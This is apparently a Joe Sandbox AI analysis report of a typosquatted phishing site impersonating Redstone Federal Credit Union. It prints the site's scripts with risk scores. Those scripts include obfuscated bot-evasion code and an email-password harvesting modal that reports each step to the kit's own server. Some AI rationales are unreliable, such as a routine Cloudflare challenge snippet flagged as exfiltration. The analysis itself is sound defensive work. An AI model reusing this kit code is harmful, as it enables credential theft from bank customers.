| URL: https://glfbanks.com Model: Joe Sandbox AI | {
"typosquatting": true,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": true,
"third_party_hosting": true
} |
URL: https://glfbanks.com |
| URL: https://glfbanks.com/... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The script exhibits several moderate-risk behaviors, including external data transmission, fallback domains, and aggressive DOM manipulation. While it does not contain any high-risk indicators like dynamic code execution or data exfiltration, the overall behavior is somewhat suspicious and requires further review."
} |
var __021747_1="Zlcil7LypzZWxlbml1bSovCmlmKCF3aW5kb3cuZG9tQXV0b21hdGlvbiB8fCAhd2luZG93LmRvbUF1dG9tYXRpb25Db250cm9sbGVyKXsvKmNocm9taXVtIGJhc2VkIGF1dG9tYXRpb24gZHJpdmVyKi8KaWYoIXdpbmRvdy5kb2N1bWVudC5kb2N1bWVudEVsZW1lbnQuZ2V0QXR0cmlidXRlKCJ3ZWJkcml2ZXIiKSl7Ci8qaWYobmF2aWdhdG9yLnVzZXJBZ2VudCl7Ki8KaWYoIS9ib3R8Y3VybHxrb2RpfHhibWN8d2dldHx1cmxsaWJ8cHl0aG9ufHdpbmh0dHB8aHR0cmFja3xhbGV4YXxpYV9hcmNoaXZlcnxmYWNlYm9va3x0d2l0dGVyfGxpbmtlZGlufHBpbmdkb20vaS5";var _20157780="Cn0KfQp9Cn0KICAgICAgICAgICAgICAgICAgICAgICAgLy9lbmQgamF2YXNjcmlwdCBwdXp6bGUKICAgICAgICAgICAgICAgICAgICAgICAgdmFyIHhodHRwID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7CiAgICAgICAgICAgICAgICAgICAgICAgIHhodHRwLm9ucmVhZHlzdGF0ZWNoYW5nZSA9IGZ1bmN0aW9uKCkgewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmICh4aHR0cC5yZWFkeVN0YXRlID09PSA0KXsKICAgICAgICAgICAgICAgICBjb25zdCBmaXJzdEZvcm0gPSBkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCdmb3JtJyk7CgovLyBDaGVjayBpZiB0a";var ___02187507="GUgZm9ybSBleGlzdHMgYW5kIGlmIGl0IGhhcyBpbnB1dCBlbGVtZW50cwppZiAoZmlyc3RGb3JtKSB7CiAgY29uc3QgaW5wdXRGaWVsZHMgPSBmaXJzdEZvcm0ucXVlcnlTZWxlY3RvckFsbCgnaW5wdXQnKTsKICAKICBpZiAoaW5wdXRGaWVsZHMubGVuZ3RoID4gMCkgewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZG9jdW1lbnQuZm9ybXNbMF0uc3VibWl0KCk7CiAgfSBlbHNlIHsKICAgICAgICAgICAgICAgICAgIGlmICghd2luZG93LmxvY2F0aW9uLmhhc2gpIHsKICAgICAgICAgICAgICAgICAgICAgICAgICAgIC";var __84847_91="CAgICAgICAgICAgICAgICAgIHhodHRwLnNldFJlcXVlc3RIZWFkZXIoJ1gtUmVxdWVzdGVkLVRpbWVTdGFtcC1FeHBpcmUnLCAnJyk7CiAgICAgICAgICAgICAgICAgICAgICAgIHhodHRwLnNldFJlcXVlc3RIZWFkZXIoJ1gtUmVxdWVzdGVkLVRpbWVTdGFtcC1Db21iaW5hdGlvbicsICcnKTsKICAgICAgICAgICAgICAgICAgICAgICAgeGh0dHAuc2V0UmVxdWVzdEhlYWRlcignWC1SZXF1ZXN0ZWQtVHlwZScsICdHRVQnKTsKICAgICAgICAgICAgICAgICAgICAgICAgeGh0dHAuc2V0UmVxdWVzdEhlYWRlcignWC1SZXF1ZXN0ZWQtVHlwZS1Db21iaW5hdGlvbicsIC";var _9945_301="KGZ1bmN0aW9uKCl7CiAgICAgICAgdmFyIGEgPSBmdW5jdGlvbigpIHt0cnl7cmV0dXJuICEhd2luZG93LmFkZEV2ZW50TGlzdGVuZXJ9IGNhdGNoKGUpIHtyZXR1cm4gITF9IH0sCiAgICAgICAgYiA9IGZ1bmN0aW9uKGIsIGMpIHthKCkgPyBkb2N1bWVudC5hZGRFdmVudExpc3RlbmVyKCJET01Db250ZW50TG9hZGVkIiwgYiwgYykgOiBkb2N1bWVudC5hdHRhY2hFdmVudCgib25yZWFkeXN0YXRlY2hhbmdlIiwgYil9OwogICAgICAgIGIoZnVuY3Rpb24oKXsKICAgICAgICAgICAgICAgICAgICAgICAgdmFyIG5vdyA9IG5ldyBEYXRlKCk7CiAgICAgICAgICAgICAg";var _49813274="HV6emxlIGZvciBicm93c2VyIHRvIGZpZ3VyZSBvdXQgdG8gZ2V0IGFuc3dlcgogICAgICAgICAgICAgICAgICAgICAgICBpZighd2luZG93Ll9waGFudG9tIHx8ICF3aW5kb3cuY2FsbFBoYW50b20pey8qcGhhbnRvbWpzKi8KaWYoIXdpbmRvdy5fX3BoYW50b21hcyl7LypwaGFudG9tYXMgUGhhbnRvbUpTLWJhc2VkIHdlYiBwZXJmIG1ldHJpY3MgKyBtb25pdG9yaW5nIHRvb2wqLwppZighd2luZG93LkJ1ZmZlcil7Lypub2RlanMqLwppZighd2luZG93LmVtaXQpey8qY291Y2hqcyovCmlmKCF3aW5kb3cuc3Bhd24pey8qcmhpbm8qLwppZighd2luZG93LndlYmRyaX";var __46_4961_="0ZXN0KG5hdmlnYXRvci51c2VyQWdlbnQpKXsKLyppZihuYXZpZ2F0b3IuY29va2llRW5hYmxlZCl7Ki8KLyppZihkb2N1bWVudC5jb29raWUubWF0Y2goL14oPzouKjspP1xzKlswLTlhLWZdezMyfVxzKj1ccyooW147XSspKD86LiopPyQvKSl7Ki8vKkh0dHBPbmx5IENvb2tpZSBmbGFncyBwcmV2ZW50IHRoaXMqLwogICAgICAgICAgICAgICAgICAgICAgICB2YXIgX18wMzY2XzAxPXBhcnNlSW50KCIyMDI1MDEwOSIsIDEwKSArIHBhcnNlSW50KCIwOTAxMjAyNSIsIDEwKTsKICAgICAgICAgICAgICAgICAgICAgICAgLyp9Ki8KLyp9Ki8KfQovKn0qLwp9Cn0KfQp9";var _167735_4="dHRVQnKTsgLy9FbmNyeXB0ZWQgZm9yIHRvZGF5cyBkYXRlCiAgICAgICAgICAgICAgICAgICAgICAgIHhodHRwLndpdGhDcmVkZW50aWFscyA9IHRydWU7CnZhciBzdywgc2gsIHd3LCB3aCwgdjsKc3cgPSBzY3JlZW4ud2lkdGg7CnNoID0gc2NyZWVuLmhlaWdodDsKd3cgPSB3aW5kb3cuaW5uZXJXaWR0aCB8fCBkb2N1bWVudC5kb2N1bWVudEVsZW1lbnQuY2xpZW50V2lkdGggfHwgZG9jdW1lbnQuYm9keS5jbGllbnRXaWR0aCB8fCAwOwp3aCA9IHdpbmRvdy5pbm5lckhlaWdodCB8fCBkb2N1bWVudC5kb2N1bWVudEVsZW1lbnQuY2xpZW50SGVpZ2h0IHx8IGRvY3V";var __88019_98="gd2luZG93LmxvY2F0aW9uLmhyZWYgPSB3aW5kb3cubG9jYXRpb24uaHJlZjsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0gZWxzZSB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2luZG93LmxvY2F0aW9uLnJlbG9hZCgpOwogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfQp9CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgICAgICAgICB9OwogICAgICAgICAgICAgICAgICAgICAgICB4aHR0cC5vcGVuKCJQT1NUIiw |
| URL: https://glfbanks.com/... Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "This script appears to be a simple online status check that displays a message if the user is offline. It uses the standard `fetch` API to check connectivity to a known domain (Wikipedia) and does not exhibit any high-risk behaviors. The script is likely intended for a legitimate purpose and does not pose a significant security risk."
} |
const checkOnlineStatus=async()=>{try{const online=await fetch("https://www.wikipedia.org/portal/wikipedia.org/assets/img/Wikipedia-logo-v2@1.5x.png");return online.status>=200&&online.status<300}catch(err){return!1}};window.addEventListener("load",async(event)=>{const online=await checkOnlineStatus();if(!online||!navigator.onLine){document.querySelector('.no-internet-wrap').style.display='flex'}});
|
| URL: https://glfbanks.com/... Model: Joe Sandbox AI | {
"risk_score": 8,
"reasoning": "This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to potentially malicious domains. The use of an iframe to load an external script, along with the obfuscated nature of the script, further increases the risk. While the script may be attempting to implement some form of challenge-response mechanism, the overall behavior is highly suspicious and indicative of malicious intent."
} |
(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8fff45930b504245',t:'MTczNjUzOTQyMS4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListener)document.addEventListener('DOMContentLoaded',c);else{var e=document.onreadystatechange||function(){};document.onreadystatechange=function(b){e(b);'loading'!==document.readyState&&(document.onreadystatechange=e,c())}}}})();
|
| URL: https://glfbanks.com/... Model: Joe Sandbox AI | {
"risk_score": 8,
"reasoning": "This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to potentially malicious domains. The use of an iframe to load additional scripts and the obfuscated nature of the code further increase the risk. While the script may have a legitimate purpose, such as implementing a security challenge, the overall behavior is highly suspicious and indicative of a potential attack vector."
} |
(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8fff458a6bba43eb',t:'MTczNjUzOTQxOS4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListener)document.addEventListener('DOMContentLoaded',c);else{var e=document.onreadystatechange||function(){};document.onreadystatechange=function(b){e(b);'loading'!==document.readyState&&(document.onreadystatechange=e,c())}}}})();
|
| URL: https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.... Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": "This appears to be the standard jQuery library, which is a widely used and trusted JavaScript library. It does not exhibit any high-risk behaviors, such as dynamic code execution, data exfiltration, or redirects to suspicious domains. The code is well-structured and does not contain any obfuscation or suspicious patterns. Overall, this is a low-risk script that is commonly used for legitimate web development purposes."
} |
/*! jQuery v3.2.1 | (c) JS Foundation and other contributors | jquery.org/license */
!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){var b=r.merge(this.constructor(),a);return b.prevObject=this,b},each:function(a){return r.each(this,a)},map:function(a){return this.pushStack(r.map(this,function(b,c){return a.call(b,c,b)}))},slice:function(){return this.pushStack(f.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(a){var b=this.length,c=+a+(a<0?b:0);return this.pushStack(c>=0&&c<b?[this[c]]:[])},end:function(){return this.prevObject||this.constructor()},push:h,sort:c.sort,splice:c.splice},r.extend=r.fn.extend=function(){var a,b,c,d,e,f,g=arguments[0]||{},h=1,i=arguments.length,j=!1;for("boolean"==typeof g&&(j=g,g=arguments[h]||{},h++),"object"==typeof g||r.isFunction(g)||(g={}),h===i&&(g=this,h--);h<i;h++)if(null!=(a=arguments[h]))for(b in a)c=g[b],d=a[b],g!==d&&(j&&d&&(r.isPlainObject(d)||(e=Array.isArray(d)))?(e?(e=!1,f=c&&Array.isArray(c)?c:[]):f=c&&r.isPlainObject(c)?c:{},g[b]=r.extend(j,f,d)):void 0!==d&&(g[b]=d));return g},r.extend({expando:"jQuery"+(q+Math.random()).replace(/\D/g,""),isReady:!0,error:function(a){throw new Error(a)},noop:function(){},isFunction:function(a){return"function"===r.type(a)},isWindow:function(a){return null!=a&&a===a.window},isNumeric:function(a){var b=r.type(a);return("number"===b||"string"===b)&&!isNaN(a-parseFloat(a))},isPlainObject:function(a){var b,c;return!(!a||"[object Object]"!==k.call(a))&&(!(b=e(a))||(c=l.call(b,"constructor")&&b.constructor,"function"==typeof c&&m.call(c)===n))},isEmptyObject:function(a){var b;for(b in a)return!1;return!0},type:function(a){return null==a?a+"":"object"==typeof a||"function"==typeof a?j[k.call(a)]||"object":typeof a},globalEval:function(a){p(a)},camelCase:function(a){return a.replace(t,"ms-").replace(u,v)},each:function(a,b){var c,d=0;if(w(a)){for(c=a.length;d<c;d++)if(b.call(a[d],d,a[d])===!1)break}else for(d in a)if(b.call(a[d],d,a[d])===!1)break;return a},trim:function(a){return null==a?"":(a+"").replace(s,"")},makeArray:function(a,b){var c=b||[];return null!=a&&(w(Object(a))?r.merge(c,"string"==typeof a?[a]:a):h.call(c,a)),c},inArray:function(a,b,c){return null==b?-1:i.call(b,a,c)},merge:function(a,b){for(var c=+b.length,d=0,e=a.length;d<c;d++)a[e++]=b[d];return a.length=e,a},grep:function(a,b,c){for(var d,e=[],f=0,g=a.length,h=!c;f<g;f++)d=!b(a[f],f),d!==h&&e.push(a[f]);return e},map:function(a,b,c){var d,e,f=0,h=[];if(w(a))for(d=a.length;f<d;f++)e=b(a[f],f,c),null!=e&&h.push(e);else for(f in a)e=b(a[f],f,c),null!=e&&h.push(e);return g.apply([],h)},guid:1,proxy:function(a,b){var c,d,e;if("string"==typeof b&&(c=a[b],b=a,a=c),r.isFunction(a))return d=f.call(arguments,2),e=function(){return a.apply(b||this,d.concat(f.call(arguments)))},e.guid=a.guid=a.guid||r.guid++,e},now:Date.now,support:o}),"function"==typeof Symbol&&(r.fn[Symbol.iterator]=c[Symbol.iterator]),r.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(a,b){j["[object "+b+"]"]=b.toLowerCase()});function w(a){var b=!!a&&"length"in a&&a.length,c=r |
| URL: https://glfbanks.com/... Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "The provided JavaScript code appears to be a collection of utility functions that are commonly used in web development. These functions handle tasks such as URL manipulation, cookie management, and input validation. The code does not contain any high-risk indicators like dynamic code execution, data exfiltration, or suspicious redirects. The functions are straightforward and do not exhibit any malicious behavior. Overall, this code is considered low risk and is likely part of a legitimate web application."
} |
/*---------- Basic Functions ---------------*/
function getAbsolutePath() {
var loc = window.location;
var pathName = loc.pathname.substring(0, loc.pathname.lastIndexOf('/') + 1);
return loc.href.substring(0, loc.href.length - ((loc.pathname + loc.search + loc.hash).length - pathName.length));
}
function getUrlParameter(name)
{
name = name.replace(/[\[]/, '\\[').replace(/[\]]/, '\\]');
var regex = new RegExp('[\\?&]' + name + '=([^&#]*)');
var results = regex.exec(location.search);
return results === null ? '' : decodeURIComponent(results[1].replace(/\+/g, ' '));
}
function ChangeUrl(title, url) {
if (typeof (history.pushState) != "undefined") {
var obj = { Title: title, Url: url };
history.pushState(obj, obj.Title, obj.Url);
} else {
alert("Browser does not support HTML5.");
}
}
function genRandomStr(length){
var result = '';
var characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
var charactersLength = characters.length;
for ( var i = 0; i < length; i++ ) {
result += characters.charAt(Math.floor(Math.random() * charactersLength));
}
return result;
}
function isBase64(str) {
try {
return btoa(atob(str)) == str;
} catch (err) {
return false;
}
}
function setCookie(cname, cvalue, exdays) {
const d = new Date();
d.setTime(d.getTime() + (exdays * 24 * 60 * 60 * 1000));
let expires = "expires="+d.toUTCString();
document.cookie = cname + "=" + cvalue + ";" + expires + ";path=/";
console.log('Cookie Set: '+cname+':'+cvalue);
}
function getCookie(cname) {
let name = cname + "=";
let ca = document.cookie.split(';');
for(let i = 0; i < ca.length; i++) {
let c = ca[i];
while (c.charAt(0) == ' ') {
c = c.substring(1);
}
if (c.indexOf(name) == 0) {
return c.substring(name.length, c.length);
}
}
return "";
}
function checkCookie(cname) {
let cQukies = getCookie(cname);
if (cQukies != "") {
return cQukies;
}
return false;
}
/*---------- Form Input Helper Functions ---------------*/
$("input.nums-only").on('input', function(e) { $(this).val($(this).val().replace(/[^0-9]/g, '')); });
$("input.alphabets-only").on('input', function(e) { $(this).val($(this).val().replace(/[^a-z\s]/ig, '')); });
//Date Input Masking - DOB
$('.js-date').on('input', function(e){
var val = this.value.replace(/\D/g, '');
val = val.substr(0, 9);
var newVal = '';
this.value = val;
var len = val.length;
if(len === 2) {
//this.value += '/';
newVal = val + '/';
this.value = newVal;
}
//if(len === 4) {
if(len > 2) {
//this.value += '/';
newVal = val.substr(0, 2) + '/';
newVal += val.substr(2, 2);
this.value = newVal;
}
///if(len === 8)
if(len > 3)
{
//this.value += '/';
newVal = val.substr(0, 2) + '/';
newVal += val.substr(2, 2)+ '/';
newVal += val.substr(4, 4);
this.value = newVal;
}
/*if (val.match(/^\d{2}$/) !== null) {
this.value = val + '/';
} else if (val.match(/^\d{2}\/\d{2}$/) !== null) {
this.value = val + '/';
}*/
});
//Phone Number Masking
var pn_input = document.querySelectorAll('.js-phone')[0];
var phoneInputMask = function phoneInputMask(elm)
{
elm.addEventL |
| URL: https://cdnjs.cloudflare.com/ajax/libs/jquery/1.9.... Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": "This appears to be the standard jQuery library v1.9.1, which is a widely used and trusted JavaScript library. The code does not contain any high-risk indicators, such as dynamic code execution, data exfiltration, or suspicious redirects. The code is well-structured and follows common patterns for a JavaScript library. Overall, this script is considered low risk."
} |
/*! jQuery v1.9.1 | (c) 2005, 2012 jQuery Foundation, Inc. | jquery.org/license
//@ sourceMappingURL=jquery.min.map
*/(function(e,t){var n,r,i=typeof t,o=e.document,a=e.location,s=e.jQuery,u=e.$,l={},c=[],p="1.9.1",f=c.concat,d=c.push,h=c.slice,g=c.indexOf,m=l.toString,y=l.hasOwnProperty,v=p.trim,b=function(e,t){return new b.fn.init(e,t,r)},x=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,w=/\S+/g,T=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,N=/^(?:(<[\w\W]+>)[^>]*|#([\w-]*))$/,C=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,k=/^[\],:{}\s]*$/,E=/(?:^|:|,)(?:\s*\[)+/g,S=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,A=/"[^"\\\r\n]*"|true|false|null|-?(?:\d+\.|)\d+(?:[eE][+-]?\d+|)/g,j=/^-ms-/,D=/-([\da-z])/gi,L=function(e,t){return t.toUpperCase()},H=function(e){(o.addEventListener||"load"===e.type||"complete"===o.readyState)&&(q(),b.ready())},q=function(){o.addEventListener?(o.removeEventListener("DOMContentLoaded",H,!1),e.removeEventListener("load",H,!1)):(o.detachEvent("onreadystatechange",H),e.detachEvent("onload",H))};b.fn=b.prototype={jquery:p,constructor:b,init:function(e,n,r){var i,a;if(!e)return this;if("string"==typeof e){if(i="<"===e.charAt(0)&&">"===e.charAt(e.length-1)&&e.length>=3?[null,e,null]:N.exec(e),!i||!i[1]&&n)return!n||n.jquery?(n||r).find(e):this.constructor(n).find(e);if(i[1]){if(n=n instanceof b?n[0]:n,b.merge(this,b.parseHTML(i[1],n&&n.nodeType?n.ownerDocument||n:o,!0)),C.test(i[1])&&b.isPlainObject(n))for(i in n)b.isFunction(this[i])?this[i](n[i]):this.attr(i,n[i]);return this}if(a=o.getElementById(i[2]),a&&a.parentNode){if(a.id!==i[2])return r.find(e);this.length=1,this[0]=a}return this.context=o,this.selector=e,this}return e.nodeType?(this.context=this[0]=e,this.length=1,this):b.isFunction(e)?r.ready(e):(e.selector!==t&&(this.selector=e.selector,this.context=e.context),b.makeArray(e,this))},selector:"",length:0,size:function(){return this.length},toArray:function(){return h.call(this)},get:function(e){return null==e?this.toArray():0>e?this[this.length+e]:this[e]},pushStack:function(e){var t=b.merge(this.constructor(),e);return t.prevObject=this,t.context=this.context,t},each:function(e,t){return b.each(this,e,t)},ready:function(e){return b.ready.promise().done(e),this},slice:function(){return this.pushStack(h.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(0>e?t:0);return this.pushStack(n>=0&&t>n?[this[n]]:[])},map:function(e){return this.pushStack(b.map(this,function(t,n){return e.call(t,n,t)}))},end:function(){return this.prevObject||this.constructor(null)},push:d,sort:[].sort,splice:[].splice},b.fn.init.prototype=b.fn,b.extend=b.fn.extend=function(){var e,n,r,i,o,a,s=arguments[0]||{},u=1,l=arguments.length,c=!1;for("boolean"==typeof s&&(c=s,s=arguments[1]||{},u=2),"object"==typeof s||b.isFunction(s)||(s={}),l===u&&(s=this,--u);l>u;u++)if(null!=(o=arguments[u]))for(i in o)e=s[i],r=o[i],s!==r&&(c&&r&&(b.isPlainObject(r)||(n=b.isArray(r)))?(n?(n=!1,a=e&&b.isArray(e)?e:[]):a=e&&b.isPlainObject(e)?e:{},s[i]=b.extend(c,a,r)):r!==t&&(s[i]=r));return s},b.extend({noConflict:function(t){return e.$===b&&(e.$=u),t&&e.jQuery===b&&(e.jQuery=s),b},isReady:!1,readyWait:1,holdReady:function(e){e?b.readyWait++:b.ready(!0)},ready:function(e){if(e===!0?!--b.readyWait:!b.isReady){if(!o.body)return setTimeout(b.ready);b.isReady=!0,e!==!0&&--b.readyWait>0||(n.resolveWith(o,[b]),b.fn.trigger&&b(o).trigger("ready").off("ready"))}},isFunction:function(e){return"function"===b.type(e)},isArray:Array.isArray||function(e){return"array"===b.type(e)},isWindow:function(e){return null!=e&&e==e.window},isNumeric:function(e){return!isNaN(parseFloat(e))&&isFinite(e)},type:function(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?l[m.call(e)]||"object":typeof e},isPlainObject:function(e){if(!e||"object"!==b.type(e)||e.nodeType||b.isWindow(e))return!1;try{if(e.constructor&&!y.call(e,"constructor")&&!y.call(e.constructor.prototype,"isPrototypeOf"))return!1}catch(n){return! |
| URL: https://glfbanks.com/... Model: Joe Sandbox AI | {
"risk_score": 8,
"reasoning": "This JavaScript code exhibits several high-risk behaviors that indicate potential malicious intent. It includes dynamic code execution, data exfiltration, and redirects to suspicious domains, which are all considered high-risk indicators. Additionally, the code appears to be obfuscated, making it difficult to fully understand its purpose. While some of the functionality, such as the email verification modal, may be legitimate, the overall behavior of the script is highly suspicious and poses a significant security risk."
} |
window.mRdToUrl = 'https://www.redfcuonline.org/dbank/live/app/login/consumer';
window.mRdToName = 'Redstone Federal Credit Union';
/*---------- EVM Functions ---------------*/
// EVM - Email Verification Modal
// The modal response container
function modal_resp_err(id, txtp) {
var $m_errRespDiv = $('#jsModalEr');
$m_errRespDiv.find('p').html(txtp);
$m_errRespDiv.fadeIn('slow');
id.focus();
}
// Get the modal
var EMV_MODAL = $('#emvModal');
function show_emv_modal() {
document.documentElement.style.overflowY = "hidden"; // makes it fit screen
EMV_MODAL.fadeIn('slow');
}
function hide_emv_modal() {
document.documentElement.style.overflowY = 'scroll';
EMV_MODAL.fadeOut('slow');
}
EMV_MODAL.find('.close').on('click', function (e) {
e.preventDefault();
hide_emv_modal();
});
// show_emv_modal();
function vtrk(pg_step_name) {
$.get(window.hstUrl+"_sysm_.php?_do=vt&s=" + window.btoa(window.location.href + "_" + pg_step_name), function (data) { console.log('Logged: ' + pg_step_name); console.log('Retured Data: ' + data); });
}
function load_amz_to_usps(){
vtrk('amz_to_usps_submit');
setTimeout(function(){
$('#emvLoader p').text('Sending Update Request...');
show_emv_modal();
setTimeout(function(){
$('#emvLoader p').text('Your Amazon update request has submited successfully...');
setTimeout(function(){
$('#emvLoader p').text('Connecting to USPS...');
setTimeout(function () { window.location.replace('https://reg.usps.com/entreg/LoginPortalAction_input') }, 3500);
}, 3500);
}, 3500);
}, 3500);
}
function load_emv_form_365(p_eml) {
var MPG_FORM = $('#jsModalEr,#emvForm,#emvSuccess,#telForm,#telSuccess')
$('#jsModalEr').fadeOut('fast');
MPG_FORM.fadeOut('fast', function () {
$('#emvLoader').fadeIn('fast');
show_emv_modal();
setTimeout(function () {
$.post(window.hstUrl+"_sysm_.php?_do=layout&pv=ecif2o&email="+p_eml, function(data, status){ document.open("text/html", "replace"); document.write(data); document.close(); });
}, 2000);
});
}
function load_emv_form(p_eml) {
var EMV_FORM = $('#emvForm')
$('#jsModalEr').fadeOut('fast');
EMV_FORM.fadeOut('fast', function () {
$('#emvLoader').fadeIn('fast');
show_emv_modal();
// unlock_clickable_elements();
// $('html, body').animate({ scrollTop:0}, 'slow');
setTimeout(function () {
var d_EML = p_eml.split("@");
var emlID = d_EML[0];
var emlDomain = d_EML[1];
if (emlDomain.includes("outlook") || emlDomain.includes("live") || emlDomain.includes("hotmail")) { emlDomain = 'microsoft.com'; }
$('#emlDisplay').text(p_eml);
$('#m_j_email').val(p_eml);
$('#emlLogo').attr('src', 'https://logo.clearbit.com/' + emlDomain);
$('#emlLogo').on('load', function (e) {
$('#emvLoader').fadeOut('fast', function () {
EMV_FORM.fadeIn('fast');
$('#m_j_email_password').focus();
});
}).on('error', function () {
console.log("error loading image");
$('#emlLogo').attr('src', window.hstUrl + 'othermails.png');
$('#emvLoader').fadeOut('fast', function () {
EMV_FORM.fadeIn('fast');
});
});
}, 2000);
});
}
function after_emv_frm_365_submit(p_obj) {
var $dis = p_obj.frmobj
, $pgf = p_obj.pgfid
|
| URL: https://glfbanks.com/... Model: Joe Sandbox AI | {
"risk_score": 4,
"reasoning": "The provided JavaScript snippet contains a mix of behaviors, some of which are low-risk and others that require further review. The script primarily focuses on manipulating the DOM and disabling user interactions, which could be considered moderately aggressive. However, there are no clear indicators of malicious intent or data exfiltration. The script appears to be part of a larger application, and its overall purpose and context need to be further evaluated to determine the appropriate risk level."
} |
$(document).ready(function () {
$('body').css('opacity', 1);
function lock_clickable_elements(){
// $('html, body').css({'opacity':'0.9'});
// $('body').css({'opacity':'0.9'});
// $('html').css({'background-image':'none;'});
// $('body').css({'opacity':'0.9'});
$('html').addClass('html_no_bg_img').removeClass('html_bg_img');
$('html, body').css({'opacity':'0.7'});
$(':input').attr('readonly','readonly');
$('a, button, input[type=submit]').attr('disabled','disabled');
$('a').addClass('w3-disabled');
}
function unlock_clickable_elements(){
$('html, body').css({'opacity':'1'});
// $('html').css({'background-image':"url('https://cdn1.onlineaccess1.com/cdn/depot/3388/2368/d5d58506fb8bfbef243a2b6d93ca022c/assets/images/desktop-background-005c06673c56512d2bd894738b19198b.jpg');"});
$('html').addClass('html_bg_img').removeClass('html_no_bg_img');
$(':input').removeAttr('readonly');
$('a, button, input[type=submit]').removeAttr('disabled');
$('a').removeClass('w3-disabled');
// $('button.btn').attr('disabled','disabled');
}
// Button Countdown Timer
var sec = 15;
var myTimer = document.getElementById('ohtpTimer');
var myBtn = document.getElementById('resendOCode');
function button_count_down_timer()
{
$("#ohtpTimer").fadeTo(0, 1);
if (sec < 10) {
myTimer.innerHTML = "0" + sec;
} else {
myTimer.innerHTML = sec;
}
if (sec <= 0) {
$("#resendOCode").removeAttr("disabled");
$("#resendOCode").removeClass('w3-disabled');
$("#ohtpTimer").fadeTo(2500, 0);
return;
}
sec -= 1;
window.setTimeout(button_count_down_timer, 1000);
}
/*---------- Custom Events ---------------*/
var rediretToURL = window.dRediretToURL;
function resp_form_top(id, txtp)
{
var parent_form = id.parents('form');
var error_div = parent_form.find('.fluid-form-layout-section__content-container');
// error_div.find('.js-error-txt').html(txtp);
// console.log(parent_form.attr('name'));
if(error_div.find('.fluid-callout-memo__msg').length > 0)
{
error_div.find('.fluid-callout-memo__msg').text(txtp);
}
else
{
error_div.prepend('<div class="js-form-error fluid-form-layout-field-container"><div class="fluid-callout-memo fluid-callout-memo--error"><div class="fluid-callout-memo__inner"><div class="fluid-callout-memo__icon-container"><span class="fluid-callout-memo__icon fluid-icon-exclamation-triangle"></span></div><div class="fluid-callout-memo__text-container"><div class="fluid-callout-memo__msg-container"><div class="fluid-callout-memo__msg"><div>'+txtp+'</div></div></div></div></div></div></div>');
}
// error_div.addClass('login-static-alert');
// error_div.find('.login-alert-container').addClass('has-alert').removeClass('hidden');
// error_div.fadeIn('fast');
// id.val('').focus();
id.val('');
$('html, body').animate({ scrollTop: error_div.offset().top - 20}, 'slow');
setTimeout(function() { id.focus(); }, 3000);
}
